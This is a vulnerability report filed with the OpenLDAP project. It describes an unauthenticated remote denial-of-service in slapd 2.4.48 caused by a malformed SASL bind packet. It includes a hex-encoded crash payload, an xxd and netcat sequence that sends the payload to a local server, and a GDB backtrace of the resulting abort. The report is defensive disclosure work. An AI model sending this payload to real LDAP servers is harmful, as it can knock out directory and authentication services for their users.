Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL:
Submission from: (NULL) (78.54.65.139)
Dear openldap team
# Issue description
Unauthenticated remote denial-of-service through malformed ldap packet
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "30840000054b020200d76084000005410201030400a38400000500a38203e2618203de308203daa003020105a1151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e766d6e6574312e766d2e626173651b1377326b332e766d6e65a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8cf3b643a2d7d3111e0aebe0eef97130b4506cbf28b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d79567bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfd0fbd3bfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf00000000000000febfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbfbf3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821831e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ed151b1357324b332e564d4e4554312e564d2e42415345a2443042a003020102a13b30391b046c6461701b1c7739dd332d3130312e77326b332e762d37343237323839373736333432303739363739766d6e6574312e766d2e62617365a382037430820370a003020117a103020108a28203620482035ea235aaeb4b8dad2cc1a67f54db030352cc34864c8c2d36313031373033343136323732353138393733b01c6c2bb49aeded09b8644ec146d29409d71838187b135aa779ca3e35c7b3d02cc60c53d65199e04b12cdc980d05cd1b0abd83791ecee27d795679594064442bcb1ecb8639a7ef1825665683557bad4839e1a7b3cc5b76fc0ac093dcc62dd34116e7f202e38118c94c6ee468ae137aa6fce3070c081dd3941889887aac17b7b9fae6b1b432f97a905fe0765df558d738b2debc47b19b59b1c9b455cc29b88eb64620b8928714e76b310d36df7c1bfbda3fb4fbdc1fd4f34c901801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede178f7373a04f3821809f800ac200ca3bc67b32e9b2a2a3745cf67c91941a1ec2fdf50aa7a3c2dbc821931e8fcc4d15184978a6801801a76f588bfc196e924338201fe3b5e5d1743d6817779d9d3eef990ede1"
| xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# GDB
...
slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) &&
old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top)
&& ((unsigned long) old_end & (pagesize - 1)) == 0)' failed.
Thread 3 "slapd" received signal SIGABRT, Aborted.
[Switching to Thread 0x7fffb4aba700 (LWP 3684510)]
0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
Missing separate debuginfos, use: dnf debuginfo-install
cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64
cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64
krb5-libs-1.17-45.fc31.x86_64 l
ibcom_err-1.45.3-1.fc31.x86_64 libdb-5.3.28-38.fc31.x86_64
libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64
libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64
libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64 open
ssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64
(gdb) bt
#0 0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
#1 0x00007ffff5b238d9 in abort () from /lib64/libc.so.6
#2 0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6
#3 0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6
#4 0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6
#5 0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6
#6 0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6
#7 0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6
#8 0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6
#9 0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110,
priority=<optimized out>,
message=0x7fffa8103d30 "Couldn't find mech
a\202\003\336\060\202\003ڠ\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301FҔ\t\327\030\070\030{\023Z\247y"...)
at sasl.c:146
#10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3
#11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3
#12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0)
at sasl.c:1524
#13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:280
#14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:205
#15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8,
arg_v=0x7fffa8003120) at connection.c:1158
#16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8,
argv=<optimized out>) at connection.c:1294
#17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at
tpool.c:696
#18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0
#19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6
Please let me know what additional information I can provide to successfully
reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg